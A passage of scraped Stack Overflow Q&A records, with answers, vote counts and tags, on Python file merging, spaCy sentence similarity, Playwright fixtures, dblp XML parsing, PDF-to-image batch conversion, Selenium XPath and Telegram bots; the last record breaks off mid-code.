[ "Does this answer your question? My version will append the data from \"like\" invoice numbers to a .txt file named with just the invoice number. In other words, anything that starts with \"Inv030001\" will have it's contents appended to \"Inv030001.txt\". The idea being that you likely don't want to overwrite files and possibly destroy them if your write logic had a mistake.\nI actually recreated your files to test this. I did exactly what I suggested you do. I just treated every part as a separate task and built it up to this, and in doing that the script became far less verbose and convoluted. I labeled all of my comments with task to pound it in that this is just a series of very simple things.\nI also renamed your vars to what they actually are. For instance, filenames aren't filenames, at all. They are entire paths.\nimport os\nfrom glob import glob\n\n#you'll have to change this path to yours\nroot = os.path.join(os.getcwd(), 'texts/')\n\n#sorting this may be redundant \npaths = sorted(glob(root+'*.txt'))\n\nfor path in paths:\n #task: get filename\n filename = path.split('\\\\')[-1]\n #task: get invoice number\n invnum = filename.split('_')[0]\n #task: open in and out files\n with open(f'{root}{invnum}.txt', 'a') as out_, open(path, 'r') as in_:\n #task: append in contents to out\n out_.write(in_.read())\n\n", "Your code may have had a little too much complications in it. And so, the idea is that for every file in the directory, just add it's contents (that is, append) to the invoice file.\nfrom glob import glob, fnmatch\nimport os\ntextfile_dir=\"invs\" + os.sep # # I changed this to os.sep since I'm on a MAC - hopefully works in windows, too\nfilenames = glob(textfile_dir+'*.txt')\nfor fname in filenames:\n filename = fname.split(os.sep)[-1] \n current_invoice_number = (filename.split('_')[0]).split('.')[0]\n with open(textfile_dir + current_invoice_number+'.txt', 'a') as outfile:\n with open(fname) as infile:\n for line in infile:\n outfile.write(line)\n\nSome room for improvement:\n\nIf you created your accumulation files in a different directory, there would be less of a chance of you picking them up when you run this program again (we are using append 'a' when we open the files for writing.\nThe order of the files is not preserved with glob (AFAIK). This may not be great for having deterministic results.\n\n", "Below is the working code, if someone is looking for same solution\nfilenames = glob(textfile_dir+'*.txt')\ndd = defaultdict(list)\nfor filename in filenames:\nname, ext = os.path.splitext(filename)\nname = name.split('\\\\')[-1].split('_')[0]\ndd[name].append(filename)\n\nfor key, fnames in dd.items():\nwith open(textfile_dir+key+'.txt', \"w\") as newfile:\n for line in fileinput.FileInput(fnames):\n newfile.write(line)\n\n" ]
[ 1, 0, 0 ]
[]
[]
[ "python", "text_files" ]
stackoverflow_0074592543_python_text_files.txt
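For the file-combining question above, a pathlib-based sketch of the same grouping idea; the folder name invoices is a placeholder assumption, not taken from the question:

from collections import defaultdict
from pathlib import Path

src = Path("invoices")  # hypothetical folder holding Inv030001_*.txt etc.
groups = defaultdict(list)
for path in sorted(src.glob("*.txt")):
    groups[path.stem.split("_")[0]].append(path)  # key: the InvNNNNNN prefix

for invoice, paths in groups.items():
    # concatenate every part file into a single InvNNNNNN.txt
    combined = "".join(p.read_text() for p in paths)
    (src / f"{invoice}.txt").write_text(combined)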
Q: Spacy, Strange similarity between two sentences I have downloaded en_core_web_lg model and trying to find similarity between two sentences: nlp = spacy.load('en_core_web_lg') search_doc = nlp("This was very strange argument between american and british person") main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.") print(main_doc.similarity(search_doc)) Which returns very strange value: 0.9066019751888448 These two sentences should not be 90% similar they have very different meanings. Why this is happening? Do I need to add some kind of additional vocabulary in order to make similarity result more reasonable? A: Spacy constructs sentence embedding by averaging the word embeddings. Since, in an ordinary sentence, there are a lot of meaningless words (called stop words), you get poor results. You can remove them like this: search_doc = nlp("This was very strange argument between american and british person") main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.") search_doc_no_stop_words = nlp(' '.join([str(t) for t in search_doc if not t.is_stop])) main_doc_no_stop_words = nlp(' '.join([str(t) for t in main_doc if not t.is_stop])) print(search_doc_no_stop_words.similarity(main_doc_no_stop_words)) or only keep nouns, since they have the most information: doc_nouns = nlp(' '.join([str(t) for t in doc if t.pos_ in ['NOUN', 'PROPN']])) A: The Spacy documentation for vector similarity explains the basic idea of it: Each word has a vector representation, learned by contextual embeddings (Word2Vec), which are trained on the corpora, as explained in the documentation. Now, the word embedding of a full sentence is simply the average over all different words. If you now have a lot of words that semantically lie in the same region (as for example filler words like "he", "was", "this", ...), and the additional vocabulary "cancels out", then you might end up with a similarity as seen in your case. The question is rightfully what you can do about it: From my perspective, you could come up with a more complex similarity measure. As the search_doc and main_doc have additional information, like the original sentence, you could modify the vectors by a length difference penalty, or alternatively try to compare shorter pieces of the sentence, and compute pairwise similarities (then again, the question would be which parts to compare). For now, there is no clean way to simply resolve this issue, sadly. A: As noted by others, you may want to use Universal Sentence Encoder or Infersent. For Universal Sentence Encoder, you can install pre-built SpaCy models that manage the wrapping of TFHub, so that you just need to install the package with pip so that the vectors and similarity will work as expected. 
You can follow the instruction of this repository (I am the author) https://github.com/MartinoMensio/spacy-universal-sentence-encoder-tfhub Install the model: pip install https://github.com/MartinoMensio/spacy-universal-sentence-encoder/releases/download/v0.4.3/en_use_md-0.4.3.tar.gz#en_use_md-0.4.3 Load and use the model import spacy # this loads the wrapper nlp = spacy.load('en_use_md') # your sentences search_doc = nlp("This was very strange argument between american and british person") main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.") print(main_doc.similarity(search_doc)) # this will print 0.310783598221594 A: As pointed out by @dennlinger, Spacy's sentence embeddings are just the average of all word vector embeddings taken individually. So if you have a sentence with negating words like "good" and "bad" their vectors might cancel each other out resulting in not so good contextual embeddings. If your usecase is specific to get sentence embeddings then you should try out below SOTA approaches. Google's Universal Sentence Encoder: https://tfhub.dev/google/universal-sentence-encoder/2 Facebook's Infersent Encoder: https://github.com/facebookresearch/InferSent I have tried both these embeddings and gives you good results to start with most of the times and use word embeddings as a base for building sentence embeddings. Cheers! A: Now Universal Sentence Encoder available on spaCy official site: https://spacy.io/universe/project/spacy-universal-sentence-encoder 1. Installation: pip install spacy-universal-sentence-encoder 2. Code example: import spacy_universal_sentence_encoder # load one of the models: ['en_use_md', 'en_use_lg', 'xx_use_md', 'xx_use_lg'] nlp = spacy_universal_sentence_encoder.load_model('en_use_lg') # get two documents doc_1 = nlp('Hi there, how are you?') doc_2 = nlp('Hello there, how are you doing today?') # use the similarity method that is based on the vectors, on Doc, Span or Token print(doc_1.similarity(doc_2[0:7]))
Spacy, Strange similarity between two sentences
I have downloaded the en_core_web_lg model and am trying to find the similarity between two sentences:
nlp = spacy.load('en_core_web_lg')

search_doc = nlp("This was very strange argument between american and british person")

main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.")

print(main_doc.similarity(search_doc))

Which returns a very strange value:
0.9066019751888448

These two sentences should not be 90% similar; they have very different meanings. Why is this happening? Do I need to add some kind of additional vocabulary in order to make the similarity result more reasonable?
[ "Spacy constructs sentence embedding by averaging the word embeddings. Since, in an ordinary sentence, there are a lot of meaningless words (called stop words), you get poor results. You can remove them like this: \nsearch_doc = nlp(\"This was very strange argument between american and british person\")\nmain_doc = nlp(\"He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.\")\n\nsearch_doc_no_stop_words = nlp(' '.join([str(t) for t in search_doc if not t.is_stop]))\nmain_doc_no_stop_words = nlp(' '.join([str(t) for t in main_doc if not t.is_stop]))\n\nprint(search_doc_no_stop_words.similarity(main_doc_no_stop_words))\n\nor only keep nouns, since they have the most information:\ndoc_nouns = nlp(' '.join([str(t) for t in doc if t.pos_ in ['NOUN', 'PROPN']]))\n\n", "The Spacy documentation for vector similarity explains the basic idea of it:\nEach word has a vector representation, learned by contextual embeddings (Word2Vec), which are trained on the corpora, as explained in the documentation.\nNow, the word embedding of a full sentence is simply the average over all different words. If you now have a lot of words that semantically lie in the same region (as for example filler words like \"he\", \"was\", \"this\", ...), and the additional vocabulary \"cancels out\", then you might end up with a similarity as seen in your case.\nThe question is rightfully what you can do about it: From my perspective, you could come up with a more complex similarity measure. As the search_doc and main_doc have additional information, like the original sentence, you could modify the vectors by a length difference penalty, or alternatively try to compare shorter pieces of the sentence, and compute pairwise similarities (then again, the question would be which parts to compare).\nFor now, there is no clean way to simply resolve this issue, sadly.\n", "As noted by others, you may want to use Universal Sentence Encoder or Infersent.\nFor Universal Sentence Encoder, you can install pre-built SpaCy models that manage the wrapping of TFHub, so that you just need to install the package with pip so that the vectors and similarity will work as expected.\nYou can follow the instruction of this repository (I am the author) https://github.com/MartinoMensio/spacy-universal-sentence-encoder-tfhub\n\nInstall the model: pip install https://github.com/MartinoMensio/spacy-universal-sentence-encoder/releases/download/v0.4.3/en_use_md-0.4.3.tar.gz#en_use_md-0.4.3\n\nLoad and use the model\n\n\nimport spacy\n# this loads the wrapper\nnlp = spacy.load('en_use_md')\n\n# your sentences\nsearch_doc = nlp(\"This was very strange argument between american and british person\")\n\nmain_doc = nlp(\"He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.\")\n\nprint(main_doc.similarity(search_doc))\n# this will print 0.310783598221594\n\n\n", "As pointed out by @dennlinger, Spacy's sentence embeddings are just the average of all word vector embeddings taken individually. So if you have a sentence with negating words like \"good\" and \"bad\" their vectors might cancel each other out resulting in not so good contextual embeddings. 
If your usecase is specific to get sentence embeddings then you should try out below SOTA approaches.\n\nGoogle's Universal Sentence Encoder: https://tfhub.dev/google/universal-sentence-encoder/2\nFacebook's Infersent Encoder: https://github.com/facebookresearch/InferSent\n\nI have tried both these embeddings and gives you good results to start with most of the times and use word embeddings as a base for building sentence embeddings.\nCheers!\n", "Now Universal Sentence Encoder available on spaCy official site: https://spacy.io/universe/project/spacy-universal-sentence-encoder\n1. Installation:\npip install spacy-universal-sentence-encoder\n\n2. Code example:\nimport spacy_universal_sentence_encoder\n# load one of the models: ['en_use_md', 'en_use_lg', 'xx_use_md', 'xx_use_lg']\nnlp = spacy_universal_sentence_encoder.load_model('en_use_lg')\n# get two documents\ndoc_1 = nlp('Hi there, how are you?')\ndoc_2 = nlp('Hello there, how are you doing today?')\n# use the similarity method that is based on the vectors, on Doc, Span or Token\nprint(doc_1.similarity(doc_2[0:7]))\n\n" ]
[ 31, 15, 10, 5, 3 ]
[]
[]
[ "nlp", "python", "spacy" ]
stackoverflow_0052113939_nlp_python_spacy.txt
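For the spaCy similarity question above, a compact sketch combining the ideas from the answers: average only content-word vectors and compare them with cosine similarity. It assumes en_core_web_lg is installed and that both sentences contain at least one content word:

import numpy as np
import spacy

nlp = spacy.load("en_core_web_lg")

def content_vector(doc):
    # average the vectors of alphabetic, non-stop tokens only
    return np.mean([t.vector for t in doc if t.is_alpha and not t.is_stop], axis=0)

def cosine(a, b):
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

doc1 = nlp("This was very strange argument between american and british person")
doc2 = nlp("He was from Japan, but a true English gentleman in my eyes, and "
           "another one of the reasons as to why I liked going to school.")
print(cosine(content_vector(doc1), content_vector(doc2)))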
Q: fixture 'page' not found - pytest playwright I started learning playwright and from documentation (https://playwright.dev/python/docs/intro) tried to to run the following sample code: import re from playwright.sync_api import Page, expect def test_pp(page: Page): page.goto("https://playwright.dev/") # Expect a title "to contain" a substring. expect(page).to_have_title(re.compile("Playwright")) # create a locator get_started = page.locator("text=Get Started") # Expect an attribute "to be strictly equal" to the value. expect(get_started).to_have_attribute("href", "/docs/intro") # Click the get started link. get_started.click() # Expects the URL to contain intro. expect(page).to_have_url(re.compile(".*intro")) While running using command pytest, throwing following error: file D:\play_wright\test\test_sample.py, line 5 def test_pp(page: Page): E fixture 'page' not found > available fixtures: cache, capfd, capfdbinary, caplog, capsys, capsysbinary, doctest_namespace, monkeypatch, pytestconfig, record_property, record_testsuite_property, record_xml_attribute, recwarn, tmp_path, tmp_path_factory, tmpdir, tmpdir_factory > use 'pytest --fixtures [testpath]' for help on them. D:\play_wright\test\test_sample.py:5 pytest-playwright module (0.3.0) is installed. confirmed with pip list command Restarted Widows Machine playwright version - 1.27.1 pytest - 6.2.1 (tried with 7.* as well) Still getting the issue. please help. A: Try the following: py.test test_.py
fixture 'page' not found - pytest playwright
I started learning playwright and from documentation (https://playwright.dev/python/docs/intro) tried to to run the following sample code: import re from playwright.sync_api import Page, expect def test_pp(page: Page): page.goto("https://playwright.dev/") # Expect a title "to contain" a substring. expect(page).to_have_title(re.compile("Playwright")) # create a locator get_started = page.locator("text=Get Started") # Expect an attribute "to be strictly equal" to the value. expect(get_started).to_have_attribute("href", "/docs/intro") # Click the get started link. get_started.click() # Expects the URL to contain intro. expect(page).to_have_url(re.compile(".*intro")) While running using command pytest, throwing following error: file D:\play_wright\test\test_sample.py, line 5 def test_pp(page: Page): E fixture 'page' not found > available fixtures: cache, capfd, capfdbinary, caplog, capsys, capsysbinary, doctest_namespace, monkeypatch, pytestconfig, record_property, record_testsuite_property, record_xml_attribute, recwarn, tmp_path, tmp_path_factory, tmpdir, tmpdir_factory > use 'pytest --fixtures [testpath]' for help on them. D:\play_wright\test\test_sample.py:5 pytest-playwright module (0.3.0) is installed. confirmed with pip list command Restarted Widows Machine playwright version - 1.27.1 pytest - 6.2.1 (tried with 7.* as well) Still getting the issue. please help.
[ "Try the following:\n\npy.test test_.py\n\n" ]
[ 1 ]
[]
[]
[ "playwright", "playwright_python", "pytest", "python" ]
stackoverflow_0074135518_playwright_playwright_python_pytest_python.txt
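For the pytest-playwright question above: if the plugin's fixtures are not being picked up for some reason, a hand-rolled page fixture in conftest.py can stand in. This is a minimal sketch using only the documented sync API, not the plugin's actual implementation:

import pytest
from playwright.sync_api import sync_playwright

@pytest.fixture
def page():
    # minimal stand-in for pytest-playwright's "page" fixture
    with sync_playwright() as p:
        browser = p.chromium.launch(headless=True)
        page = browser.new_page()
        yield page
        browser.close()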
Q: Parse and Query Large XML File Using Python I am working on a project for which I have to parse and query a relatively large xml file in python. I am using a dataset with data about scientific articles. The dataset can be found via this link (https://dblp.uni-trier.de/xml/dblp.xml.gz). There are 7 types of entries in the dataset: article, inproceedings, proceedings, book, incollection, phdthesis and masterthesis. An entry has the following attributes: author, title, year and either journal or booktitle. I am looking for the best way to parse this and consequently perform queries on the dataset. Examples of queries that I would like to perform are: retrieve articles that have a certain author retrieve articles if the title contains a certain word retrieve articles to which author x and author y both contributed. ... Herewith a snapshot of an entry in the xml file: <article mdate="2020-06-25" key="tr/meltdown/s18" publtype="informal"> <author>Paul Kocher</author> <author>Daniel Genkin</author> <author>Daniel Gruss</author> <author>Werner Haas 0004</author> <author>Mike Hamburg</author> <author>Moritz Lipp</author> <author>Stefan Mangard</author> <author>Thomas Prescher 0002</author> <author>Michael Schwarz 0001</author> <author>Yuval Yarom</author> <title>Spectre Attacks: Exploiting Speculative Execution.</title> <journal>meltdownattack.com</journal> <year>2018</year> <ee type="oa">https://spectreattack.com/spectre.pdf</ee> </article> Does anybody have an idea on how to do this efficiently? I have experimented with using the ElementTree. However, when parsing the file I get the following error: xml.etree.ElementTree.ParseError: undefined entity &Ouml;: line 90, column 17 Additionally, I am not sure if using the ElementTree will be the most efficient way for querying this xml file. A: If the file is large, and you want to perform multiple queries, then you don't want to be parsing the file and building a tree in memory every time you do a query. You also don't want to be writing the queries in low-level Python, you need a proper query language. You should be loading the data into an XML database such as BaseX or ExistDB. You can then query it using XQuery. This will be a bit more effort to set up, but will make your life a lot easier in the long run. A: Please share your code as a minimal example; otherwise, how should we know where the error message comes from? What do you find in line 90? The message sounds like an encoding problem. I suggest using etree.iterparse() and pandas or a sqlite3 database. After that you can easily search with SQL.
Parse and Query Large XML File Using Python
I am working on a project for which I have to parse and query a relatively large xml file in python. I am using a dataset with data about scientific articles. The dataset can be found via this link (https://dblp.uni-trier.de/xml/dblp.xml.gz). There are 7 types of entries in the dataset: article, inproceedings, proceedings, book, incollection, phdthesis and masterthesis. An entry has the following attributes: author, title, year and either journal or booktitle. I am looking for the best way to parse this and consequently perform queries on the dataset. Examples of queries that I would like to perform are: retrieve articles that have a certain author retrieve articles if the title contains a certain word retrieve articles to which author x and author y both contributed. ... Herewith a snapshot of an entry in the xml file: <article mdate="2020-06-25" key="tr/meltdown/s18" publtype="informal"> <author>Paul Kocher</author> <author>Daniel Genkin</author> <author>Daniel Gruss</author> <author>Werner Haas 0004</author> <author>Mike Hamburg</author> <author>Moritz Lipp</author> <author>Stefan Mangard</author> <author>Thomas Prescher 0002</author> <author>Michael Schwarz 0001</author> <author>Yuval Yarom</author> <title>Spectre Attacks: Exploiting Speculative Execution.</title> <journal>meltdownattack.com</journal> <year>2018</year> <ee type="oa">https://spectreattack.com/spectre.pdf</ee> </article> Does anybody have an idea on how to do to this efficiently? I have experimented with using the ElementTree. However, when parsing the file I get the following error: xml.etree.ElementTree.ParseError: undefined entity &Ouml;: line 90, column 17 Additionally, I am not sure if using the ElementTree will be the most efficient way for querying this xml file.
[ "If the file is large, and you want to perform multiple queries, then you don't want to be parsing the file and building a tree in memory every time you do a query. You also don't want to be writing the queries in low-level Python, you need a proper query language.\nYou should be loading the data into an XML database such as BaseX or ExistDB. You can then query it using XQuery. This will be a bit more effort to set up, but will make your life a lot easier in the long run.\n", "Please share your code as a minimal example, how should we know otherwise where the error message comes from. What do you find in Line 90? The message sounds like a encoding problem. I suggest use ˋentree.iterparse()ˋ and pandas or a sqlite3 database. After that you can easy search by SQL.\n" ]
[ 0, 0 ]
[]
[]
[ "data_mining", "python", "xml" ]
stackoverflow_0074467660_data_mining_python_xml.txt
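For the dblp question above: the undefined-entity error arises because dblp.xml declares characters such as &Ouml; in its companion DTD, so the parser must load dblp.dtd. A streaming sketch, assuming lxml is installed, the archive is decompressed, and dblp.dtd sits next to dblp.xml:

from lxml import etree

context = etree.iterparse(
    "dblp.xml", load_dtd=True, resolve_entities=True,
    tag=("article", "inproceedings"),
)
for _, elem in context:
    title = elem.findtext("title") or ""
    authors = [a.text for a in elem.findall("author")]
    if "Spectre" in title:  # example query: title contains a certain word
        print(title, authors)
    elem.clear()  # release processed elements to keep memory flat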
Q: Convert multiple multipage PDFs to JPGs in subfolders Simple use case: A folder with many (mostly multipage) PDF files. A script should convert each PDF page to JPG and store it in a subfolder named after the PDF filename. (e.g. #33.pdf to folder #33) Single JPG files should also have this filename plus a counter mirroring the sequential page number in the PDF. (e.g. #33_001.jpg) I found a bounch of related questions, but nothing that quite does what I want, e.g. How do I convert multiple PDFs into images from the same folder in Python? A python script would work fine, but also any other way to do this in Win10 (imagemagick, e.g.) is cool with me. A: Your comment requests how a batch can do as required, for simplicity the following only processes a single file so Python will need to loop through a folder and call with each name in turn. That could be done by adding a "for loop" in batch but first see where problems arise, as many of my single test files threw differing errors. I have tried to cover several fails in this batch file, in my system, but there can still be issues such as a file that has no valid fonts to display For most recent poppler windows 64bit utils see https://github.com/oschwartz10612/poppler-windows/releases/ for 32 bit use xpdf latest version http://www.xpdfreader.com/download.html but that has direct pdftopng.exe so needs a few edits. pdf2dir.bat @echo off set "bin=C:\Apps\PDF\poppler\22.11.0\Library\bin" set "res=200" REM for type use one of 3 i.e. png jpeg jpegcmyk (PNG is best for documents) set "type=png" if exist "%~dpn1\*.%type%" echo: &echo Files already exist in "%~dpn1" skipping overwrite&goto pause if not exist "%~dpn1.pdf" echo: &echo "%~dpn0" File "%~dpn1.pdf" not found&goto pause if not exist "%~dpn1\*.*" md "%~dpn1" REM following line deliberately opens folder to show progress delete it or prefix with REM for blind running explorer "%~dpn1" "%bin%\pdftoppm.exe" -%type% -r %res% "%~dpn1.pdf" "%~dpn1\%~n1" if %errorlevel%==1 echo: &echo Build of %type% files failed&goto pause if not exist "%~dpn1\*.%type%" echo: &echo Build of %type% files failed&goto pause :pause echo: pause :end It requires Poppler binaries path to pdftoppm be correctly set in the second line It can be placed wherever desired i.e. work folder or desktop It allows for drag and drop of one pdf on top will (should work) without need to run in console Can be run in a command console and place a space character after, you can drag and drop a single filename but any spaces in name must be "double quoted" can be run from any shell or OS command as "path to/batchfile.bat" "c:\path to\file.pdf"
Convert multiple multipage PDFs to JPGs in subfolders
Simple use case: A folder with many (mostly multipage) PDF files. A script should convert each PDF page to JPG and store it in a subfolder named after the PDF filename. (e.g. #33.pdf to folder #33) Single JPG files should also have this filename plus a counter mirroring the sequential page number in the PDF. (e.g. #33_001.jpg) I found a bunch of related questions, but nothing that quite does what I want, e.g. How do I convert multiple PDFs into images from the same folder in Python? A Python script would work fine, but also any other way to do this in Win10 (imagemagick, e.g.) is cool with me.
[ "Your comment requests how a batch can do as required, for simplicity the following only processes a single file so Python will need to loop through a folder and call with each name in turn. That could be done by adding a \"for loop\" in batch but first see where problems arise, as many of my single test files threw differing errors.\nI have tried to cover several fails in this batch file, in my system, but there can still be issues such as a file that has no valid fonts to display\n\nFor most recent poppler windows 64bit utils see https://github.com/oschwartz10612/poppler-windows/releases/ for 32 bit use xpdf latest version http://www.xpdfreader.com/download.html but that has direct pdftopng.exe so needs a few edits.\npdf2dir.bat\n@echo off\nset \"bin=C:\\Apps\\PDF\\poppler\\22.11.0\\Library\\bin\"\nset \"res=200\"\nREM for type use one of 3 i.e. png jpeg jpegcmyk (PNG is best for documents)\nset \"type=png\"\n\nif exist \"%~dpn1\\*.%type%\" echo: &echo Files already exist in \"%~dpn1\" skipping overwrite&goto pause\nif not exist \"%~dpn1.pdf\" echo: &echo \"%~dpn0\" File \"%~dpn1.pdf\" not found&goto pause\n\nif not exist \"%~dpn1\\*.*\" md \"%~dpn1\"\n\nREM following line deliberately opens folder to show progress delete it or prefix with REM for blind running\nexplorer \"%~dpn1\"\n\n\"%bin%\\pdftoppm.exe\" -%type% -r %res% \"%~dpn1.pdf\" \"%~dpn1\\%~n1\"\nif %errorlevel%==1 echo: &echo Build of %type% files failed&goto pause\nif not exist \"%~dpn1\\*.%type%\" echo: &echo Build of %type% files failed&goto pause\n\n:pause\necho:\npause\n:end\n\n\n\nIt requires Poppler binaries path to pdftoppm be correctly set in the second line\nIt can be placed wherever desired i.e. work folder or desktop\nIt allows for drag and drop of one pdf on top will (should work) without need to run in console\nCan be run in a command console and place a space character after, you can drag and drop a single filename but any spaces in name must be \"double quoted\"\ncan be run from any shell or OS command as \"path to/batchfile.bat\" \"c:\\path to\\file.pdf\"\n\n" ]
[ 0 ]
[]
[]
[ "batch_processing", "image", "imagemagick", "pdf", "python" ]
stackoverflow_0074546533_batch_processing_image_imagemagick_pdf_python.txt
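For the PDF-to-JPG question above, a Python sketch using the pdf2image package (a Poppler wrapper). It assumes pdf2image and the Poppler binaries are installed; the source path and the 200 DPI setting are placeholder choices:

from pathlib import Path
from pdf2image import convert_from_path  # pip install pdf2image

src = Path(".")  # folder containing the PDFs
for pdf in src.glob("*.pdf"):
    out_dir = src / pdf.stem  # e.g. '#33.pdf' -> subfolder '#33'
    out_dir.mkdir(exist_ok=True)
    # one PIL image per page, saved as '#33_001.jpg', '#33_002.jpg', ...
    for page_no, image in enumerate(convert_from_path(str(pdf), dpi=200), start=1):
        image.save(out_dir / f"{pdf.stem}_{page_no:03d}.jpg", "JPEG")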
Q: VSCode Kernel Selector when clicked does not display any options Despite having multiple interpreters available (3.10.8, 3.9.13 from anaconda), whenever I click "Select Kernel" in my ipynb notebook, nothing comes up except for "Install suggested extensions Python + Jupyter," none of which are helpful since I already have the suggested extensions installed. Does anyone know how I can appropriately select a kernel here? A: I uninstalled, then reinstalled VSCode. base (Python 3.9.13) was instantly selected for me upon opening the reinstalled version of VSC.
VSCode Kernel Selector when clicked does not display any options
Despite having multiple interpreters available (3.10.8, 3.9.13 from anaconda), whenever I click "Select Kernel" in my ipynb notebook, nothing comes up except for "Install suggested extensions Python + Jupyter," none of which are helpful since I already have the suggested extensions installed. Does anyone know how I can appropriately select a kernel here?
[ "I uninstalled, then reinstalled VSCode. base (Python 3.9.13) was instantly selected for me upon opening the reinstalled version of VSC.\n" ]
[ 0 ]
[]
[]
[ "anaconda", "jupyter_notebook", "kernel", "python", "visual_studio_code" ]
stackoverflow_0074592584_anaconda_jupyter_notebook_kernel_python_visual_studio_code.txt
Q: How to find an element under located header using python selenium With selenium in python, I want to collect data about a user called "Graham" on the website below: https://github.com/GrahamDumpleton/wrapt/graphs/contributors Following the previous question, I located the header including the name "Graham" by finding XPath: driver.find_elements(By.XPATH, "//h3[contains(@class,'border-bottom')][contains(.,'Graham')]") How could I find an element under this located header? The XPath is: //*[@id="contributors"]/ol/li/span/h3/span[2]/span/div/a Thank you. A: The element you looking for can be uniquely located by the following XPath: //a[contains(.,'commit')]. So, if you want to locate directly all the commit amounts of users on the page this can be done as following: commits = driver.find_elements(By.XPATH, "//a[contains(.,'commit')]") for commit in commits: print(commit.text) And if you want to locate the commits amount per specific user when you already located the user's block or header element as we do in the previous question, this can be done as following: header = driver.find_elements(By.XPATH, "//h3[contains(@class,'border-bottom')][contains(.,'Graham')]") commit = header.find_element(By.XPATH, ".//a[contains(.,'commit')]") print(commit.text) Pay attention. Here header.find_element(By.XPATH, ".//a[contains(.,'commit')]") we applied find_element method on header web element object, not on the driver object. We use a dot . at the beginning of the XPath to start searching from the current node (header), not from the beginning of the entire DOM. UPD addition can be located with this XPath: //span[@class='cmeta']//span[contains(.,'++')] and deletion with //span[@class='cmeta']//span[contains(.,'--')] A: Xpath expression (//*[@class="border-bottom p-2 lh-condensed"])[1] will select indivisual profile Example: from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.chrome.service import Service import time webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://github.com/GrahamDumpleton/wrapt/graphs/contributors') driver.maximize_window() time.sleep(5) n = driver.find_element(By.XPATH,'(//*[@class="border-bottom p-2 lh-condensed"])[1]') name= n.find_element(By.XPATH, './/a[@class="text-normal"]').text print(name) Output: GrahamDumpleton
How to find an element under located header using python selenium
With selenium in python, I want to collect data about a user called "Graham" on the website below: https://github.com/GrahamDumpleton/wrapt/graphs/contributors Following the previous question, I located the header including the name "Graham" by finding XPath: driver.find_elements(By.XPATH, "//h3[contains(@class,'border-bottom')][contains(.,'Graham')]") How could I find an element under this located header? The XPath is: //*[@id="contributors"]/ol/li/span/h3/span[2]/span/div/a Thank you.
[ "The element you looking for can be uniquely located by the following XPath: //a[contains(.,'commit')].\nSo, if you want to locate directly all the commit amounts of users on the page this can be done as following:\ncommits = driver.find_elements(By.XPATH, \"//a[contains(.,'commit')]\")\nfor commit in commits:\n print(commit.text)\n\nAnd if you want to locate the commits amount per specific user when you already located the user's block or header element as we do in the previous question, this can be done as following:\nheader = driver.find_elements(By.XPATH, \"//h3[contains(@class,'border-bottom')][contains(.,'Graham')]\")\ncommit = header.find_element(By.XPATH, \".//a[contains(.,'commit')]\")\nprint(commit.text)\n\nPay attention.\n\nHere header.find_element(By.XPATH, \".//a[contains(.,'commit')]\") we applied find_element method on header web element object, not on the driver object.\nWe use a dot . at the beginning of the XPath to start searching from the current node (header), not from the beginning of the entire DOM.\n\nUPD\naddition can be located with this XPath: //span[@class='cmeta']//span[contains(.,'++')] and deletion with //span[@class='cmeta']//span[contains(.,'--')]\n", "Xpath expression (//*[@class=\"border-bottom p-2 lh-condensed\"])[1] will select indivisual profile\nExample:\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nimport time\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://github.com/GrahamDumpleton/wrapt/graphs/contributors')\ndriver.maximize_window()\ntime.sleep(5)\n\nn = driver.find_element(By.XPATH,'(//*[@class=\"border-bottom p-2 lh-condensed\"])[1]')\nname= n.find_element(By.XPATH, './/a[@class=\"text-normal\"]').text\nprint(name)\n\nOutput:\nGrahamDumpleton\n\n" ]
[ 1, 1 ]
[]
[]
[ "python", "selenium", "selenium_webdriver", "web_scraping", "xpath" ]
stackoverflow_0074593047_python_selenium_selenium_webdriver_web_scraping_xpath.txt
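For the Selenium question above, one possible loop that pairs every contributor's name with their commit count, putting the two answers together. The class names come from the answers and may change whenever GitHub updates its markup:

from selenium import webdriver
from selenium.webdriver.common.by import By

driver = webdriver.Chrome()
driver.implicitly_wait(10)  # give the contributor blocks time to render
driver.get("https://github.com/GrahamDumpleton/wrapt/graphs/contributors")

blocks = driver.find_elements(
    By.XPATH, '//*[@class="border-bottom p-2 lh-condensed"]')
for block in blocks:
    name = block.find_element(By.XPATH, './/a[@class="text-normal"]').text
    commits = block.find_element(By.XPATH, ".//a[contains(.,'commit')]").text
    print(name, commits)  # e.g. a name followed by "N commits"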
Q: How to gather all chats a Telegram bot is an admin of? How is it possible to get all chats in the form of an iterable object (list-like) or iterate over all possible chats the bot is an admin/participant of (using python-telegram-bot)? Is there a python-telegram-bot method for getting all chats a bot is an admin/participant of? A: No, there is not, because the Telegram Bot API does not provide such a method. You can use the Update.my_chat_member updates to keep track of that. See here for an example on how that can be done using python-telegram-bot. Disclaimer: I'm currently the maintainer of python-telegram-bot.
How to gather all chats a Telegram bot is an admin of?
How is it possible to get all chats in the form of an iterable object (list-like) or iterate over all possible chats the bot is an admin/participant of (using python-telegram-bot)? Is there a python-telegram-bot method for getting all chats a bot is an admin/participant of?
[ "No, there is not, because the Telegram Bot API does not provide such a method. You can use the Update.my_chat_member updates to keep track of that. See here for an example on how that can be done using python-telgeram-bot.\n\nDisclaimer: I'm currently the maintainer of python-telegram-bot.\n" ]
[ 1 ]
[]
[]
[ "iterable", "python", "python_3.x", "python_telegram_bot", "telegram_bot" ]
stackoverflow_0074591204_iterable_python_python_3.x_python_telegram_bot_telegram_bot.txt
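For the Telegram question above, a condensed sketch of the my_chat_member tracking the answer points to, assuming python-telegram-bot v20+; "TOKEN" is a placeholder:

from telegram import ChatMember, Update
from telegram.ext import Application, ChatMemberHandler

known_chats = set()  # in-memory registry; persist it for real use

async def track_chats(update, context):
    member = update.my_chat_member
    status = member.new_chat_member.status
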